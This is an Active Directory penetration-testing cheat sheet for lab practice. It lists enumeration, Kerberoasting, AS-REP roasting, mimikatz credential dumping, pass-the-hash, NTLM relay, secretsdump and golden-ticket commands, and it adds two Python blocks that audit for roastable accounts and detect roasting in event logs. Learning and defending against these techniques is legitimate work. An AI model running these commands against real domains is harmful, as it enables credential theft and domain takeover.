Quick Guide To AD Pentesting

🔥 Step-by-Step AD Pentesting Cheat Sheet

1๏ธโƒฃ Enumeration (Always Start Here!)

Your goal: Find Users, Computers, Groups, and AD Misconfigurations.

🔹 Basic Enumeration (No Credentials)

✅ nmap -p 88,135,139,389,445,464,593,636,3268,3389 --script=ldap* --script=smb* <target>
✅ smbclient -L //<target> -N → Check SMB Shares
✅ crackmapexec smb <target> → Check SMB, Users, and Shares
✅ kerbrute userenum -d domain.com --dc <DC-IP> usernames.txt → Find Valid Users

🔹 Detailed Enumeration (With Credentials)

✅ bloodhound-python -u user -p pass -d domain.com -c All -dc-ip <DC-IP> → Full AD Mapping
✅ rpcclient -U 'user%pass' <DC-IP> → Query AD Info
✅ net group "Domain Admins" /domain → Check Domain Admins
✅ net user /domain → List All Users
✅ crackmapexec ldap <DC-IP> -u user -p pass --asreproast → Check for AS-REP Roastable Accounts
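The enumeration above surfaces the same directory misconfigurations a defender should be auditing for on a schedule. The following is an added example, not part of the original cheat sheet: a small audit that walks user records shaped like LDAP attributes (the records are constructed sample data, and the group names and the one-year password-age threshold are assumptions) and reports accounts with DONT_REQ_PREAUTH set (AS-REP roastable) and user accounts carrying a servicePrincipalName (Kerberoastable), ranking the latter higher when the account is in a privileged group or has a stale password.

```python
"""Audit constructed AD user records for the two misconfigurations that
roasting attacks depend on. Added example; the records below are sample
data, not output from any real domain."""
from datetime import datetime, timedelta

# userAccountControl bit flags (documented Microsoft values)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Assumed set of groups treated as privileged for severity ranking
PRIVILEGED_GROUPS = ("Domain Admins", "Enterprise Admins", "Administrators")

# Constructed sample records (not real data). 0x10200 = NORMAL_ACCOUNT |
# DONT_EXPIRE_PASSWORD; 0x410200 adds DONT_REQ_PREAUTH; 0x10202 adds ACCOUNTDISABLE.
SAMPLE_USERS = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.domain.com:1433"],
     "pwdLastSet": datetime(2019, 3, 1),
     "memberOf": ["CN=Domain Admins,CN=Users,DC=domain,DC=com"]},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x410200,
     "servicePrincipalName": [], "pwdLastSet": datetime(2023, 1, 10), "memberOf": []},
    {"sAMAccountName": "alice", "userAccountControl": 0x200,
     "servicePrincipalName": [], "pwdLastSet": datetime(2024, 4, 1), "memberOf": []},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x10202,
     "servicePrincipalName": ["HTTP/app.domain.com"],
     "pwdLastSet": datetime(2018, 1, 1), "memberOf": []},
]


def is_privileged(user):
    """True if any memberOf DN names one of the assumed privileged groups."""
    return any(any(g in dn for g in PRIVILEGED_GROUPS) for dn in user["memberOf"])


def audit_users(users, now, max_pwd_age=timedelta(days=365)):
    """Return sorted (account, finding, severity) tuples.

    asrep_roastable: DONT_REQ_PREAUTH is set, so the KDC hands out a
    password-derived blob to anyone who asks; fix by clearing the flag.
    kerberoastable: a user (not computer) account has an SPN, so any domain
    user can request a ticket encrypted with its password; fix with a long
    random password, a gMSA, or AES-only encryption types.
    Disabled accounts are reported at low severity as clean-up items.
    """
    findings = []
    for u in users:
        name = u["sAMAccountName"]
        uac = u["userAccountControl"]
        disabled = bool(uac & UF_ACCOUNTDISABLE)
        if uac & UF_DONT_REQUIRE_PREAUTH:
            findings.append((name, "asrep_roastable", "low" if disabled else "high"))
        # Computer accounts end in '$' and have random 120-char passwords
        if u["servicePrincipalName"] and not name.endswith("$"):
            if disabled:
                sev = "low"
            elif is_privileged(u) or now - u["pwdLastSet"] > max_pwd_age:
                sev = "high"
            else:
                sev = "medium"
            findings.append((name, "kerberoastable", sev))
    return sorted(findings)


if __name__ == "__main__":
    for account, finding, severity in audit_users(SAMPLE_USERS, now=datetime(2024, 5, 1)):
        print(f"{severity:6} {finding:16} {account}")
```

In a real environment the records would come from an LDAP query for `(&(objectClass=user)(objectCategory=person))` returning the four attributes used here; the ranking logic is what turns the raw list into a remediation queue.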

📌 If You Find Null SMB Shares or Weak Users → Move to Exploitation.


2๏ธโƒฃ Exploitation (Privilege Escalation & Lateral Movement)

Your goal: Escalate Privileges from a Low-Level User.

🔹 Kerberoasting (If Kerberos Enabled)

✅ GetUserSPNs.py -dc-ip <DC-IP> domain/user:pass -request
✅ john --wordlist=rockyou.txt hash.txt

🔹 AS-REP Roasting (If User Doesn't Require Pre-Auth)

✅ GetNPUsers.py -dc-ip <DC-IP> -usersfile users.txt domain/ -format hashcat
✅ hashcat -m 18200 hash.txt rockyou.txt --force
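Both roasting techniques leave a distinctive trace on the domain controller: AS-REP roasting produces a 4768 (TGT requested) event with Pre-Authentication Type 0, and Kerberoasting produces a burst of 4769 (service ticket requested) events with RC4 (0x17) encryption for many different SPNs from one client. The following is an added detection example, not code from the original cheat sheet; it runs over constructed sample events written in a simplified key=value form (an assumption for readability, real Security-log events carry the same fields with spaces in the names), and the five-minute window and three-SPN threshold are tuning assumptions.

```python
"""Detection logic for Kerberoasting and AS-REP Roasting over constructed
sample Security-log events (4768 / 4769). Added example, not page code."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in a simplified key=value form (not real logs).
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01 EventID=4768 Account=svc_backup PreAuthType=0 TicketEncryptionType=0x17 ClientAddress=10.0.0.50",
    "2024-05-01T10:00:02 EventID=4768 Account=alice PreAuthType=2 TicketEncryptionType=0x12 ClientAddress=10.0.0.21",
    "2024-05-01T10:01:00 EventID=4769 Account=alice ServiceName=svc_sql TicketEncryptionType=0x17 ClientAddress=10.0.0.50",
    "2024-05-01T10:01:01 EventID=4769 Account=alice ServiceName=svc_web TicketEncryptionType=0x17 ClientAddress=10.0.0.50",
    "2024-05-01T10:01:02 EventID=4769 Account=alice ServiceName=svc_backup TicketEncryptionType=0x17 ClientAddress=10.0.0.50",
    "2024-05-01T10:05:00 EventID=4769 Account=bob ServiceName=host/ws01 TicketEncryptionType=0x12 ClientAddress=10.0.0.22",
    "2024-05-01T10:30:00 EventID=4769 Account=bob ServiceName=svc_sql TicketEncryptionType=0x17 ClientAddress=10.0.0.22",
]

RC4_HMAC = "0x17"  # RC4 tickets are what offline-cracking tools ask for; AES is 0x11/0x12


def parse_event(line):
    """Turn one sample line into a dict; the leading token is the timestamp."""
    ts, *fields = line.split()
    event = {"Time": datetime.fromisoformat(ts)}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def find_asrep_roast_candidates(events):
    """4768 with PreAuthType 0 means a TGT was issued without pre-auth, i.e. the
    account has DONT_REQ_PREAUTH set. Returns (account, was_rc4) pairs; RC4
    makes the hit worth immediate triage."""
    hits = []
    for e in events:
        if e.get("EventID") == "4768" and e.get("PreAuthType") == "0":
            hits.append((e["Account"], e["TicketEncryptionType"] == RC4_HMAC))
    return hits


def find_kerberoast_suspects(events, window=timedelta(minutes=5), threshold=3):
    """Flag (account, client) pairs that request RC4 service tickets for at
    least `threshold` distinct services inside one `window`. A normal client
    uses AES and rarely fans out across many SPNs in seconds."""
    per_client = defaultdict(list)
    for e in events:
        if e.get("EventID") == "4769" and e.get("TicketEncryptionType") == RC4_HMAC:
            per_client[(e["Account"], e["ClientAddress"])].append((e["Time"], e["ServiceName"]))
    suspects = {}
    for key, reqs in per_client.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # slide the window from each request
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                suspects[key] = sorted(services)
                break
    return suspects


def run_detections(lines=SAMPLE_EVENTS):
    """Parse the lines and return (asrep_hits, kerberoast_suspects)."""
    evs = [parse_event(line) for line in lines]
    return find_asrep_roast_candidates(evs), find_kerberoast_suspects(evs)


if __name__ == "__main__":
    asrep, roast = run_detections()
    print("AS-REP candidates:", asrep)
    print("Kerberoast suspects:", roast)
```

On the sample data only svc_backup is reported as an AS-REP candidate and only alice's client at 10.0.0.50 trips the Kerberoast rule; bob's single RC4 request stays below the threshold, which is the point of counting distinct SPNs per window rather than alerting on every RC4 ticket.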

🔹 Pass-the-Hash / Pass-the-Ticket (Lateral Movement)

✅ mimikatz.exe → sekurlsa::logonpasswords → Steal Passwords
✅ psexec.py domain/user@target -hashes LM:NT

🔹 NTLM Relay Attacks (If SMB Signing is Disabled)

✅ ntlmrelayx.py -t smb://target --smb2support

📌 If you get a higher-privilege account → Use It for Full Compromise.


3๏ธโƒฃ Full Domain Compromise (Domain Admin Access!)

Your goal: Get Domain Admin and Dump All Passwords.

🔹 Check if You Are a Domain Admin

✅ whoami /groups
✅ net group "Domain Admins" /domain

🔹 Dump All AD Hashes (If DA Access)

✅ secretsdump.py -dc-ip <DC-IP> domain/admin:password@target

🔹 Golden Ticket Attack (Persistence)

✅ mimikatz.exe → kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXXX /krbtgt:HASH /ptt

📌 Once You Get DA → You Have Fully Compromised the Domain!


🔥 How to Know What to Use in a Lab? (Decision-Making Tree)

✅ 1. Do I have credentials?

  • ❌ No → Start with Enumeration

  • ✅ Yes → Use BloodHound & CrackMapExec

✅ 2. Can I Kerberoast / AS-REP Roast?

  • ✅ Yes → Extract Hashes & Crack Them

  • ❌ No → Try Lateral Movement

✅ 3. Do I have SMB, LDAP, or Kerberos Misconfigurations?

  • ✅ Yes → Exploit Using NTLM Relay, Pass-the-Hash, or Kerberos Attacks

  • ❌ No → Look for Local Privilege Escalation on Workstations

✅ 4. Do I have Domain Admin access?

  • ✅ Yes → Dump Hashes & Maintain Access

  • ❌ No → Pivot to Another User or Machine


🔥 Next Steps for You

  • Use this step-by-step method in any AD lab.

  • Start practicing each attack individually on TryHackMe (THM) & Hack The Box (HTB).

  • Use BloodHound to visualize attack paths (this helps a lot).

  • If stuck, Google specific errors & read writeups (everyone does this, even pros).
